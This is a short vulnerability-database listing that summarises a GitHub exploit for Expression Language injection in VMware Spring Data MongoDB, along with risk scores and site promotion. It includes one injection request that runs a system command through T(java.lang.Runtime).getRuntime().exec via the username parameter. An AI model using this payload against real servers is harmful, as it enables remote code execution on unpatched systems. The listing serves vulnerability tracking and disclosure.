Lucene search

K

Exploit for Expression Language Injection in Vmware Spring Data Mongodb

🗓️ 22 Jun 2022 07:22:51Type 
githubexploit
 githubexploit
👁 442 Views

Exploit for Expression Language Injection in Vmware Spring Data Mongodb. Start redis on port 27017, project on springboot starts on port 6666. Injection example: GET /v1/user/get?username=T(java.lang.Runtime).getRuntime().exec('open+-a+calculator.app') HTTP/1.

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Related

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
22 Jun 2022 07:51Current
9.6High risk
Vulners AI Score9.6
CVSS26.8
CVSS39.8
EPSS0.86349
442
.json
Report